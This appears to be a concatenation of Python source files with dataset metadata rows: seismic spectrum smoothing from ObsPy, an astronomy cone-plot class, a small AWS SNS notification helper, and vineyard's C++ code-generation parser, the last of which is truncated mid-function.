    :type normalize: bool, optional
    :param normalize:
        Set to True to normalize each window on a normal (linear) scale
        rather than the default logarithmic one.  Defaults to False.
    """
    bin_count = len(frequencies)
    sm_matrix = np.empty((bin_count, bin_count), frequencies.dtype)
    for row_index, center_frequency in enumerate(frequencies):
        sm_matrix[row_index, :] = konno_ohmachi_smoothing_window(
            frequencies, center_frequency, bandwidth, normalize=normalize)
    return sm_matrix
def apply_smoothing_matrix(spectra, smoothing_matrix, count=1):
    """
    Smooth one or more spectra with a precomputed Konno-Ohmachi matrix.

    The matrix is expected to come from
    :func:`~obspy.signal.konnoohmachismoothing.calculate_smoothing_matrix`
    and must share its frequency bins with every spectrum.  ``spectra`` may
    be a single spectrum or a matrix holding one spectrum per row, which
    makes smoothing many identically binned spectra across separate calls
    cheap.

    :param spectra: One spectrum, or one spectrum per row (float32/64).
    :param smoothing_matrix: Precomputed smoothing matrix.
    :param count: How many additional passes to apply beyond the first;
        the smoothing is always applied at least once.  Defaults to 1.
    """
    if spectra.dtype not in (np.float32, np.float64):
        raise ValueError('`spectra` needs to have a dtype of float32/64.')
    # First application is unconditional; count - 1 further passes follow.
    smoothed = spectra @ smoothing_matrix
    for _ in range(count - 1):
        smoothed = smoothed @ smoothing_matrix
    return smoothed
def konno_ohmachi_smoothing(spectra, frequencies, bandwidth=40, count=1,
                            enforce_no_matrix=False, max_memory_usage=512,
                            normalize=False):
    """
    Smooths a matrix containing one spectra per row with the Konno-Ohmachi
    smoothing window.

    All spectra need to have frequency bins corresponding to the same
    frequencies.

    This method first will estimate the memory usage and then either use a fast
    and memory intensive method or a slow one with a better memory usage.

    :type spectra: :class:`numpy.ndarray` (float32 or float64)
    :param spectra:
        One or more spectra per row. If more than one the first spectrum has to
        be accessible via spectra[0], the next via spectra[1], ...
    :type frequencies: :class:`numpy.ndarray` (float32 or float64)
    :param frequencies:
        Contains the frequencies for the spectra.
    :type bandwidth: float
    :param bandwidth:
        Determines the width of the smoothing peak. Lower values result in a
        broader peak. Must be greater than 0. Defaults to 40.
    :type count: int, optional
    :param count:
        How often to apply the filter. For very noisy spectra it is useful to
        apply it more than once. Defaults to 1.
    :type enforce_no_matrix: bool, optional
    :param enforce_no_matrix:
        An efficient but memory intensive matrix-multiplication algorithm is
        used in case more than one spectra is to be smoothed or one spectrum is
        to be smoothed more than once if enough memory is available. This flag
        disables the matrix algorithm altogether. Defaults to False
    :type max_memory_usage: int, optional
    :param max_memory_usage:
        Set the maximum amount of extra memory in MB for this method. Decides
        whether or not the matrix multiplication method is used. Defaults to
        512 MB.
    :type normalize: bool, optional
    :param normalize:
        The Konno-Ohmachi smoothing window is normalized on a logarithmic
        scale. Set this parameter to True to normalize it on a normal scale.
        Default to False.
    """
    if spectra.dtype not in (np.float32, np.float64):
        msg = '`spectra` needs to have a dtype of float32/64.'
        raise ValueError(msg)
    if frequencies.dtype not in (np.float32, np.float64):
        msg = '`frequencies` needs to have a dtype of float32/64.'
        raise ValueError(msg)
    # Spectra and frequencies should have the same dtype.  If they differ,
    # both are promoted to float64 and a warning is emitted.
    if frequencies.dtype != spectra.dtype:
        frequencies = np.require(frequencies, np.float64)
        spectra = np.require(spectra, np.float64)
        msg = '`frequencies` and `spectra` should have the same dtype. It ' + \
            'will be changed to np.float64 for both.'
        warnings.warn(msg)
    # Check the dtype to get the correct size in bytes per element.  After the
    # checks above the dtype is guaranteed to be float32 or float64, so
    # exactly one of these branches is taken.
    if frequencies.dtype == np.float32:
        size = 4.0
    elif frequencies.dtype == np.float64:
        size = 8.0
    # Calculate the approximate usage needs for the smoothing matrix algorithm
    # (matrix + input + output), in MB.
    length = len(frequencies)
    approx_mem_usage = (length * length + 2 * len(spectra) + length) * \
        size / 1048576.0
    # If smaller than the allowed maximum memory consumption build a smoothing
    # matrix and apply to each spectrum. Also only use when more than one
    # spectrum is to be smoothed (or one spectrum more than once).
    if enforce_no_matrix is False and (len(spectra.shape) > 1 or count > 1) \
            and approx_mem_usage < max_memory_usage:
        smoothing_matrix = calculate_smoothing_matrix(
            frequencies, bandwidth, normalize=normalize)
        return apply_smoothing_matrix(spectra, smoothing_matrix, count=count)
    # Otherwise just calculate the smoothing window for every frequency bin
    # and apply it individually (slower, but only O(n) extra memory).
    else:
        new_spec = np.empty(spectra.shape, spectra.dtype)
        # Separate case for just one spectrum.
        if len(new_spec.shape) == 1:
            for _i in range(len(frequencies)):
                window = konno_ohmachi_smoothing_window(
                    frequencies, frequencies[_i], bandwidth,
                    normalize=normalize)
                new_spec[_i] = (window * spectra).sum()
        # Reuse smoothing window if more than one spectrum.
        else:
            for _i in range(len(frequencies)):
                window = konno_ohmachi_smoothing_window(
                    frequencies, frequencies[_i], bandwidth,
                    normalize=normalize)
                for _j, spec in enumerate(spectra):
                    new_spec[_j, _i] = (window * spec).sum()
        # Eventually apply more than once, recursing with the matrix algorithm
        # disabled so the memory bound keeps being honored.
        for _i in range(count - 1):
            new_spec = konno_ohmachi_smoothing(
                new_spec, frequencies, bandwidth, enforce_no_matrix=True,
                normalize=normalize)
        return new_spec
| 43.682171 | 79 | 0.670541 | 1,479 | 11,270 | 5.030426 | 0.218391 | 0.052419 | 0.033871 | 0.03629 | 0.376613 | 0.311156 | 0.302016 | 0.284274 | 0.28172 | 0.28172 | 0 | 0.016961 | 0.251908 | 11,270 | 257 | 80 | 43.85214 | 0.865496 | 0.574091 | 0 | 0.294118 | 0 | 0 | 0.069412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047059 | false | 0 | 0.047059 | 0 | 0.164706 | 0.011765 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6c3f82af976559e939a2459be138b4fcfdc18c | 2,515 | py | Python | igmtools/plot/special.py | cwfinn/igmtools | 6e14973fd1e69d5e7bd7c40f93ffe11e2cd41990 | [
"BSD-3-Clause"
] | null | null | null | igmtools/plot/special.py | cwfinn/igmtools | 6e14973fd1e69d5e7bd7c40f93ffe11e2cd41990 | [
"BSD-3-Clause"
] | null | null | null | igmtools/plot/special.py | cwfinn/igmtools | 6e14973fd1e69d5e7bd7c40f93ffe11e2cd41990 | [
"BSD-3-Clause"
] | 1 | 2019-11-19T04:45:38.000Z | 2019-11-19T04:45:38.000Z | """
Specialist plots.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from .general import Plot
from matplotlib.transforms import Affine2D
from matplotlib.projections import PolarAxes
from mpl_toolkits.axisartist.grid_finder import MaxNLocator
from mpl_toolkits.axes_grid1 import make_axes_locatable
import mpl_toolkits.axisartist.floating_axes as floating_axes
import mpl_toolkits.axisartist.angle_helper as angle_helper
from matplotlib.axes import Axes
import numpy as np
class ConePlot(Plot):
    """
    Defines the layout of a cone plot: a wedge-shaped (polar) projection with
    right ascension as the angular coordinate and redshift as the radial one,
    built on matplotlib's floating curvilinear axes.  Data should be drawn on
    ``self.aux_ax`` (plain RA/z data coordinates), not on the host axes.
    """
    def __init__(self, rotation, ra_min, ra_max, z_min, z_max, stretch=1,
                 nrows=1, ncols=1, npar=1, width=8.0, aspect=0.8,
                 gridspec=None, blank=True, fontsize=16, legend_fontsize=14,
                 family='serif', style='Times', weight='normal', usetex=False):
        """
        Parameters
        ----------
        rotation : float
            Angular offset applied before the degree-to-radian scaling, used
            to orient the wedge (same units as the RA inputs — presumably
            degrees; TODO confirm against callers).
        ra_min, ra_max : float
            Angular (right ascension) extent of the wedge.
        z_min, z_max : float
            Radial (redshift) extent of the wedge.
        stretch : float, optional
            Multiplier on the degree-to-radian scaling, widening or narrowing
            the apparent opening angle.  Defaults to 1.
        nrows, ncols, npar, width, aspect, gridspec, blank, fontsize,
        legend_fontsize, family, style, weight, usetex :
            Forwarded unchanged to ``Plot.__init__``.
        """
        super(ConePlot, self).__init__(
            nrows, ncols, npar, width, aspect, gridspec, blank, fontsize,
            legend_fontsize, family, style, weight, usetex)

        # Rotate for better orientation:
        rotate = Affine2D().translate(rotation, 0)

        # Scale degree to radians:
        scale = Affine2D().scale(np.pi * stretch / 180, 1)

        transform = rotate + scale + PolarAxes.PolarTransform()

        # Angular (RA) ticks formatted as hours/minutes/seconds; radial (z)
        # ticks with at most 5 locations.
        grid_locator1 = angle_helper.LocatorHMS(4)
        grid_locator2 = MaxNLocator(5)
        tick_formatter1 = angle_helper.FormatterHMS()

        self.grid_helper = floating_axes.GridHelperCurveLinear(
            transform, extremes=(ra_min, ra_max, z_min, z_max),
            grid_locator1=grid_locator1, grid_locator2=grid_locator2,
            tick_formatter1=tick_formatter1, tick_formatter2=None)

        ax = floating_axes.FloatingSubplot(
            self, 111, grid_helper=self.grid_helper)

        # Re-orient the floating axes so the wedge reads naturally: redshift
        # labeled along the left edge, RA along the (curved) top edge.
        ax.axis['left'].set_axis_direction('bottom')
        ax.axis['right'].set_axis_direction('top')
        ax.axis['bottom'].set_visible(False)
        ax.axis['top'].set_axis_direction('bottom')
        ax.axis['top'].toggle(ticklabels=True, label=True)
        ax.axis['top'].major_ticklabels.set_axis_direction('top')
        ax.axis['top'].label.set_axis_direction('top')
        ax.axis['left'].label.set_text('Redshift')
        ax.axis['top'].label.set_text('RA (J2000)')

        # Parasite axes in the original (untransformed) data coordinates;
        # plot data on this rather than on the host axes.
        aux_ax = ax.get_aux_axes(transform)
        aux_ax.patch = ax.patch
        # Lower the shared patch's zorder so it does not hide artists drawn
        # on the parasite axes.
        ax.patch.zorder = 0.9

        self.add_subplot(ax)
        self.aux_ax = aux_ax
5e6dc0ca5c7ca67c2ac3d9248b5244fdd0c19cc9 | 431 | py | Python | ChaosMonkey/notification.py | RedXIV2/TUD-ChaosMonkey | d73d5ed13d0fc353d8204f7abecd0344c4c1439d | [
"MIT"
] | 1 | 2019-03-21T13:46:25.000Z | 2019-03-21T13:46:25.000Z | ChaosMonkey/notification.py | RedXIV2/TUD-ChaosMonkey | d73d5ed13d0fc353d8204f7abecd0344c4c1439d | [
"MIT"
] | null | null | null | ChaosMonkey/notification.py | RedXIV2/TUD-ChaosMonkey | d73d5ed13d0fc353d8204f7abecd0344c4c1439d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Author: Dave Hill
# This code will trigger a SNS notification
import boto3
# CONSTANTS
TARGET_ARN = "arn:aws:sns:eu-west-1:924169754118:chaosMonkey-notifications"
def sendSNSNotification(deliverableMessage):
    """Publish ``deliverableMessage`` to the chaos-monkey SNS topic.

    Parameters:
        deliverableMessage (str): Message body to publish to TARGET_ARN.

    Returns:
        dict: The boto3 ``publish`` response, which includes the
        ``MessageId`` of the published notification so callers can
        confirm delivery.  (Previously the response was discarded.)
    """
    snsClient = boto3.client('sns')
    response = snsClient.publish(
        TargetArn=TARGET_ARN,
        Message=deliverableMessage
    )
    print("Sending notification to "+TARGET_ARN)
    return response
| 21.55 | 75 | 0.714617 | 48 | 431 | 6.354167 | 0.770833 | 0.088525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045198 | 0.178654 | 431 | 19 | 76 | 22.684211 | 0.816384 | 0.211137 | 0 | 0 | 0 | 0 | 0.262048 | 0.180723 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6e6f169fa35ff46472321863b6b4d79335d9a8 | 23,977 | py | Python | python/vineyard/core/codegen/parsing.py | septicmk/v6d | 3c64e0a324adfe71feb4bfda51d0e55724bfde8d | [
"Apache-2.0"
] | null | null | null | python/vineyard/core/codegen/parsing.py | septicmk/v6d | 3c64e0a324adfe71feb4bfda51d0e55724bfde8d | [
"Apache-2.0"
] | null | null | null | python/vineyard/core/codegen/parsing.py | septicmk/v6d | 3c64e0a324adfe71feb4bfda51d0e55724bfde8d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import itertools
import logging
import os
from collections import Counter
from typing import List
from typing import Optional
from typing import Tuple
# Error message rendered when the optional libclang runtime is absent.
DEP_MISSING_ERROR = '''
Dependencies {dep} cannot be found, please try again after:
pip3 install {dep}
'''

# libclang is required for parsing; fail early with an actionable hint.
try:
    import clang.cindex as cindex
    from clang.cindex import Cursor
    from clang.cindex import CursorKind
    from clang.cindex import Type
    from clang.cindex import TypeKind
except ImportError:
    raise RuntimeError(DEP_MISSING_ERROR.format(dep='libclang'))
###############################################################################
#
# parse codegen spec:
#
# __attribute__((annotate("vineyard"))): vineyard classes
# __attribute__((annotate("shared"))): shared member/method
# __attribute__((annotate("streamable"))): shared member/method
# __attribute__((annotate("distributed"))): shared member/method
#
class CodeGenKind:
    """Describes how a vineyard member participates in code generation.

    ``kind`` is one of ``meta``/``plain``/``set``/``list``/``dlist``/``dict``.
    ``element_type`` (when given) is ``(typename, star)``, or the nested
    ``((key,), (value, star))`` form for dict-like members; ``star`` marks
    pointer (shared/unique_ptr) members.
    """

    def __init__(self, kind='meta', element_type=None):
        self.kind = kind
        if element_type is None:
            self.element_type = None
            self.star = ''
        elif isinstance(element_type[0], tuple):
            # dict-like spec: ((key_type,), (value_type, star))
            self.element_type = (element_type[0][0], element_type[1][0])
            self.star = element_type[1][1]
        else:
            self.element_type = element_type[0]
            self.star = element_type[1]
        # pointer members are used directly; value members get dereferenced
        self.deref = '' if self.star else '*'

    @property
    def is_meta(self):
        return self.kind == 'meta'

    @property
    def is_plain(self):
        return self.kind == 'plain'

    @property
    def is_set(self):
        return self.kind == 'set'

    @property
    def is_list(self):
        return self.kind == 'list'

    @property
    def is_dlist(self):
        return self.kind == 'dlist'

    @property
    def is_dict(self):
        return self.kind == 'dict'

    def __repr__(self):
        suffix = '*' if self.star else ''
        if self.is_meta:
            return 'meta'
        if self.is_plain:
            return '%s%s' % (self.element_type, suffix)
        if self.is_list:
            return '[%s%s]' % (self.element_type, suffix)
        if self.is_dlist:
            return '[[%s%s]]' % (self.element_type, suffix)
        if self.is_set:
            return '{%s%s}' % (self.element_type, suffix)
        if self.is_dict:
            return '{%s: %s%s}' % (self.element_type[0], self.element_type[1], suffix)
        raise RuntimeError('Invalid codegen kind: %s' % self.kind)
def figure_out_namespace(node: "Cursor") -> Optional[str]:
    """Return the fully-qualified namespace enclosing *node* (``a::b``),
    or ``None`` when the node is not nested inside any namespace.

    Walks the semantic-parent chain and joins every NAMESPACE ancestor
    from outermost to innermost.
    """
    parts = []
    cursor = node
    while True:
        parent = cursor.semantic_parent
        if parent is None:
            break
        if parent.kind == CursorKind.NAMESPACE:
            parts.append(parent.spelling)
        cursor = parent
    if not parts:
        return None
    return '::'.join(reversed(parts))
def unpack_pointer_type(node_type: Type) -> Tuple[Type, str, str]:
    """Strip one level of pointer-ness from *node_type*.

    Returns ``(inner_type, star, typename)`` where ``star`` is ``'*'`` for a
    raw pointer or a ``std::shared_ptr``/``std::unique_ptr`` wrapper (which
    is unwrapped to its first template argument), and ``typename`` is the
    spelling with its enclosing namespace prefix removed.
    """
    if node_type.kind == TypeKind.POINTER:
        node_type = node_type.get_pointee()
        star = '*'
    else:
        basename = node_type.spelling.split('<')[0]
        namespace = figure_out_namespace(node_type.get_declaration())
        # Smart pointers count as pointers.  Note 'and' binds tighter than
        # 'or', so each pair reads "namespace is std(::__1) and basename is
        # shared_ptr/unique_ptr".
        if (
            basename == 'std::shared_ptr'
            or namespace in ['std', 'std::__1']
            and basename == 'shared_ptr'
            or basename == 'std::unique_ptr'
            or namespace in ['std', 'std::__1']
            and basename == 'unique_ptr'
        ):
            star = '*'
            node_type = node_type.get_template_argument_type(0)
            namespace = figure_out_namespace(node_type.get_declaration())
        else:
            star = ''
    # NOTE(review): 'namespace' is only assigned on the non-POINTER path; a
    # raw POINTER argument would reach the check below with 'namespace'
    # unbound (NameError).  Presumably raw pointers never occur in practice
    # (members are smart pointers) -- confirm against callers.
    node_typename = node_type.spelling
    if namespace is not None and node_typename.startswith(namespace):
        # drop "namespace::" (the +2 skips the '::' separator)
        node_typename = node_typename[len(namespace) + 2 :]
    return node_type, star, node_typename
def is_template_parameter(node: "Cursor", typename: str) -> bool:
    """Whether *typename* names a template type parameter of the class
    template that declares *node*."""
    parent = node.semantic_parent
    if parent is None:
        return False
    if parent.kind != CursorKind.CLASS_TEMPLATE:
        return False
    return any(
        child.kind == CursorKind.TEMPLATE_TYPE_PARAMETER
        and child.spelling == typename
        for child in parent.get_children()
    )
def is_primitive_types(
    node: "Cursor", node_type: "cindex.Type", typename: str, star: str
) -> bool:
    """Whether the member is stored directly in the metadata (POD, a class
    template parameter, or a known string/json alias) rather than as a
    separate vineyard object."""
    if star:
        # pointer members are never primitives
        return False
    if node_type.is_pod():
        return True
    if is_template_parameter(node, typename):
        # treat template parameter as meta, see `scalar.vineyard-mod`.
        return True
    known_aliases = (
        'std::string',
        'String',
        'vineyard::String',
        'json',
        'vineyard::json',
    )
    return typename in known_aliases
def is_list_type(namespace: str, basename: str) -> bool:
    """Whether the spelling refers to ``vineyard::Tuple``/``vineyard::List``,
    either fully qualified in *basename* or via the resolved *namespace*."""
    if basename in ('vineyard::Tuple', 'vineyard::List'):
        return True
    return namespace == 'vineyard' and basename in ('Tuple', 'List')
def is_dict_type(namespace: str, basename: str) -> bool:
    """Whether the spelling refers to ``vineyard::Map`` or
    ``vineyard::UnorderedMap`` (qualified or resolved via namespace)."""
    if basename in ('vineyard::Map', 'vineyard::UnorderedMap'):
        return True
    return namespace == 'vineyard' and basename in ('Map', 'UnorderedMap')
def parse_codegen_spec_from_type(node: Cursor):
    """Classify a member declaration's C++ type as a :class:`CodeGenKind`.

    Pointer wrappers are flattened by ``unpack_pointer_type``; vineyard
    Tuple/List map to list/dlist kinds, Map/UnorderedMap to dict kinds, and
    containers of primitive elements collapse to plain ``meta`` members.
    """
    node_type, star, typename = unpack_pointer_type(node.type)
    if star:
        # reject pointer-of-pointer members (e.g. shared_ptr<T*>)
        _, star_inside, _ = unpack_pointer_type(node_type)
        if star_inside:
            raise ValueError(
                'Pointer of pointer %s is not supported' % node.type.spelling
            )
    basename = typename.split('<')[0]
    namespace = figure_out_namespace(node_type.get_declaration())
    if not star:
        if is_list_type(namespace, basename):
            element_type = node_type.get_template_argument_type(0)
            nested_base_name = element_type.spelling.split('<')[0]
            nested_namespace = figure_out_namespace(element_type.get_declaration())
            if is_list_type(nested_namespace, nested_base_name):
                # nested list (e.g. Tuple<Tuple<T>>) -> 'dlist'
                element_type = element_type.get_template_argument_type(0)
                element_type, inside_star, element_typename = unpack_pointer_type(
                    element_type
                )
                typekind = 'dlist'
            else:
                element_type, inside_star, element_typename = unpack_pointer_type(
                    element_type
                )
                if is_primitive_types(
                    node, element_type, element_typename, inside_star
                ):
                    if inside_star:
                        raise ValueError(
                            'pointer of primitive types inside Tuple/List is not '
                            'supported: %s' % node.type.spelling
                        )
                    # lists of primitives live entirely in the metadata
                    return CodeGenKind('meta')
                else:
                    typekind = 'list'
            return CodeGenKind(typekind, (element_typename, inside_star))
        if is_dict_type(namespace, basename):
            key_type = node_type.get_template_argument_type(0)
            key_typename = key_type.spelling
            value_type = node_type.get_template_argument_type(1)
            value_type, inside_star, value_typename = unpack_pointer_type(value_type)
            if is_primitive_types(node, value_type, value_typename, inside_star):
                if inside_star:
                    raise ValueError(
                        'pointer of primitive types inside Map is not supported: %s'
                        % node.type.spelling
                    )
                return CodeGenKind('meta')
            else:
                return CodeGenKind(
                    'dict', ((key_typename,), (value_typename, inside_star))
                )
    if is_primitive_types(node, node_type, typename, star):
        return CodeGenKind('meta')
    else:
        # directly return: generate data members, in pointer format
        return CodeGenKind('plain', (basename, star))
###############################################################################
#
# dump the AST for debugging
#
def is_std_ns(node: "Cursor") -> bool:
    """Whether *node* is the ``std`` namespace, including libc++'s inline
    ``std::__1`` alias."""
    if node.kind != CursorKind.NAMESPACE:
        return False
    if node.spelling == 'std':
        return True
    if node.spelling != '__1':
        return False
    parent = node.semantic_parent
    return (
        parent is not None
        and parent.kind == CursorKind.NAMESPACE
        and parent.spelling == 'std'
    )
def is_reference_node(node):
    """Whether the cursor is a reference to another declaration (type,
    template, member, overload, or variable reference)."""
    reference_kinds = (
        CursorKind.TYPE_REF,
        CursorKind.TEMPLATE_REF,
        CursorKind.MEMBER_REF,
        CursorKind.OVERLOADED_DECL_REF,
        CursorKind.VARIABLE_REF,
    )
    return node.kind in reference_kinds
def dump_ast(
    node, indent=0, saw=None, base_indent=4, include_refs=False, include_ref_depth=1
):
    """Pretty-print the clang AST rooted at *node* for debugging.

    *saw* counts nodes on the current recursion path (incremented on entry,
    decremented on exit); it is created on the first call when not supplied.
    When *include_refs* is set, the definitions of reference nodes are also
    dumped, up to *include_ref_depth* levels deep.
    """
    if saw is None:
        saw = Counter()
    k: "CursorKind" = node.kind
    # skip printing UNEXPOSED_* cursors
    if not k.is_unexposed():
        tpl = '{indent}{kind}{name}{type_name}'
        if node.spelling:
            name = ' s: %s' % node.spelling
        else:
            name = ''
        if node.type and node.type.spelling:
            type_name = ', t: %s' % node.type.spelling
        else:
            type_name = ''
        # FIXME: print opcode or literal
        print(
            tpl.format(indent=' ' * indent, kind=k.name, name=name, type_name=type_name)
        )
    saw[str(node.hash)] += 1
    # FIXME: skip auto generated decls
    # At the top level, children belonging to the std namespace are skipped
    # by counting them first and only recursing once the counter hits zero.
    skip = len([c for c in node.get_children() if indent == 0 and is_std_ns(c)])
    for c in node.get_children():
        if indent == 0 and is_std_ns(c):
            skip -= 1
        if skip == 0:
            dump_ast(
                c,
                indent + base_indent,
                saw,
                base_indent,
                include_refs,
                include_ref_depth - 1,
            )
    if include_refs and include_ref_depth > 0 and is_reference_node(node):
        ch = node.get_definition()
        if ch is not None:
            dump_ast(
                ch,
                indent + base_indent,
                saw,
                base_indent,
                include_refs,
                include_ref_depth - 1,
            )
    saw[str(node.hash)] -= 1
class ParseOption:
    """Bit flags accepted by ``Index.parse`` (these mirror libclang's
    ``CXTranslationUnit_*`` option values)."""
    Default = 0x0
    DetailedPreprocessingRecord = 0x01
    Incomplete = 0x02
    PrecompiledPreamble = 0x04
    CacheCompletionResults = 0x08
    ForSerialization = 0x10
    CXXChainedPCH = 0x20
    SkipFunctionBodies = 0x40
    IncludeBriefCommentsInCodeCompletion = 0x80
    CreatePreambleOnFirstParse = 0x100
    KeepGoing = 0x200
    SingleFileParse = 0x400
    LimitSkipFunctionBodiesToPreamble = 0x800
    IncludeAttributedTypes = 0x1000
    VisitImplicitAttributes = 0x2000
    IgnoreNonErrorsFromIncludedFiles = 0x4000
    RetainExcludedConditionalBlocks = 0x8000
###############################################################################
#
# AST utils
#
def check_serialize_attribute(node):
    """Return the first vineyard codegen annotation attached to *node*
    (``vineyard``/``vineyard(streamable)``/``shared``/``distributed``),
    or ``None`` when the node carries no recognized annotation."""
    recognized = (
        'vineyard',
        'vineyard(streamable)',
        'shared',
        'distributed',
    )
    for child in node.get_children():
        if child.kind != CursorKind.ANNOTATE_ATTR:
            continue
        # str.startswith accepts a tuple of prefixes
        if child.spelling.startswith(recognized):
            return child.spelling
    return None
def check_if_class_definition(node):
    """Whether *node* is an actual class definition (it owns bases, access
    specifiers, methods, or fields) rather than a mere declaration."""
    return any(
        child.kind in (
            CursorKind.CXX_BASE_SPECIFIER,
            CursorKind.CXX_ACCESS_SPEC_DECL,
            CursorKind.CXX_METHOD,
            CursorKind.FIELD_DECL,
        )
        for child in node.get_children()
    )
def filter_the_module(root, filepath):
    """Return the direct children of *root* that were declared in the file
    *filepath*, dropping nodes pulled in from included headers."""
    return [
        child
        for child in root.get_children()
        if child.location
        and child.location.file
        and child.location.file.name == filepath
    ]
def traverse(node, to_reflect, to_include, namespaces=None):
    '''Traverse the AST tree.

    Appends annotated class definitions to *to_reflect* as
    ``(attribute, namespaces, node)`` tuples and inclusion directives to
    *to_include*, recursing only into translation units and namespaces.
    '''
    if node.kind in [
        CursorKind.CLASS_DECL,
        CursorKind.CLASS_TEMPLATE,
        CursorKind.STRUCT_DECL,
    ]:
        # codegen for all top-level classes (definitions, not declarations) in
        # the given file.
        if check_if_class_definition(node):
            attribute = check_serialize_attribute(node)
            if attribute in ['vineyard', 'vineyard(streamable)']:
                to_reflect.append((attribute, namespaces, node))
    if node.kind == CursorKind.INCLUSION_DIRECTIVE:
        to_include.append(node)
    if node.kind in [CursorKind.TRANSLATION_UNIT, CursorKind.NAMESPACE]:
        if node.kind == CursorKind.NAMESPACE:
            # copy so sibling namespaces don't share the accumulated list
            if namespaces is None:
                namespaces = []
            else:
                namespaces = copy.copy(namespaces)
            namespaces.append(node.spelling)
        for child in node.get_children():
            traverse(child, to_reflect, to_include, namespaces=namespaces)
def find_fields(definition):
    """Collect the codegen-relevant members of a class definition.

    Returns ``(fields, using_alias, first_mmeber_offset, has_post_construct)``:
    annotated field/method cursors, ``using`` aliases as ``(name, extent)``
    pairs, the file offset of the first real member (the insertion point for
    generated code), and whether the class overrides ``PostConstruct``.
    """
    fields, using_alias, first_mmeber_offset, has_post_construct = [], [], -1, False
    for child in definition.get_children():
        if first_mmeber_offset == -1:
            # skip template parameters, base specifiers and annotations when
            # locating the first real member
            if child.kind not in [
                CursorKind.TEMPLATE_TYPE_PARAMETER,
                CursorKind.CXX_BASE_SPECIFIER,
                CursorKind.ANNOTATE_ATTR,
            ]:
                first_mmeber_offset = child.extent.start.offset
        if child.kind == CursorKind.FIELD_DECL:
            attribute = check_serialize_attribute(child)
            if attribute in ['shared', 'distributed']:
                fields.append(child)
            continue
        if child.kind == CursorKind.CXX_METHOD:
            attribute = check_serialize_attribute(child)
            if attribute == 'distributed':
                raise ValueError(
                    'The annotation "[[distributed]]" is not allowed on methods'
                )
            if attribute == 'shared':
                fields.append(child)
            # a PostConstruct override is detected via its override attribute
            if not has_post_construct and child.spelling == 'PostConstruct':
                for body in child.get_children():
                    if body.kind == CursorKind.CXX_OVERRIDE_ATTR:
                        has_post_construct = True
                        break
            continue
        if child.kind == CursorKind.TYPE_ALIAS_DECL:
            using_alias.append((child.spelling, child.extent))
            continue
    return fields, using_alias, first_mmeber_offset, has_post_construct
def find_distributed_field(definitions: List["Cursor"]) -> Optional["Cursor"]:
    """Find the unique member annotated ``[[distributed]]``.

    Returns the matching field cursor, ``None`` when no field is annotated,
    and raises :class:`ValueError` when more than one field carries the
    annotation.  (Annotations corrected: the values are ``Cursor``s, not
    ``CursorKind``s; the error message previously lacked its closing paren.)
    """
    fields = []
    for child in definitions:
        if child.kind == CursorKind.FIELD_DECL:
            attribute = check_serialize_attribute(child)
            if attribute in ['distributed']:
                fields.append(child)
    if len(fields) == 0:
        return None
    if len(fields) == 1:
        return fields[0]
    raise ValueError(
        'A distributed object can only have at most one distributed member '
        '(annotated with "[[distributed]]")'
    )
def split_members_and_methods(fields):
    """Partition annotated cursors into ``(members, methods)`` by kind;
    raises for anything that is neither a field nor a method."""
    members, methods = [], []
    for field in fields:
        if field.kind == CursorKind.FIELD_DECL:
            bucket = members
        elif field.kind == CursorKind.CXX_METHOD:
            bucket = methods
        else:
            raise ValueError('Unknown field kind: %s' % field)
        bucket.append(field)
    return members, methods
def check_class(node):
    """Return the class name together with its template type parameters
    (each as a ``(spelling, extent)`` pair)."""
    template_parameters = [
        (child.spelling, child.extent)
        for child in node.get_children()
        if child.kind == CursorKind.TEMPLATE_TYPE_PARAMETER
    ]
    return node.spelling, template_parameters
def generate_template_header(ts):
    """Render ``template<typename T, ...>`` for the parameter names *ts*;
    names already prefixed with ``typename`` are kept as-is.  An empty
    input yields an empty string."""
    if not ts:
        return ''
    rendered = [
        t if t.startswith('typename') else 'typename %s' % t
        for t in ts
    ]
    return 'template<{ps}>'.format(ps=', '.join(rendered))
def generate_template_type(name, ts):
    """Render an instantiated template type ``name<T1, T2>``; without
    parameters the bare *name* is returned."""
    if not ts:
        return name
    return '%s<%s>' % (name, ', '.join(ts))
def parse_compilation_database(build_directory):
    """Load ``compile_commands.json`` from *build_directory*, returning
    ``None`` when the directory is unset, the file is missing/unreadable,
    or libclang fails to load it."""
    if build_directory is None:
        return None
    # check if the file exists first to suppress the clang warning.
    db_path = os.path.join(build_directory, 'compile_commands.json')
    readable = os.path.isfile(db_path) and os.access(db_path, os.R_OK)
    if not readable:
        return None
    try:
        return cindex.CompilationDatabase.fromDirectory(build_directory)
    except cindex.CompilationDatabaseError:
        return None
def validate_and_strip_input_file(source):
    """Read *source* and rewrite ``[[attr]]`` annotations into
    ``__attribute__((annotate("attr")))`` so libclang can see them.

    Returns ``(content, error_message)``; *content* is ``None`` (with a
    message) when the file is missing or unreadable.
    """
    if not (os.path.isfile(source) and os.access(source, os.R_OK)):
        return None, 'File not exists'
    with open(source, 'r', encoding='utf-8') as fp:
        # pass(TODO): valid and remove the first line
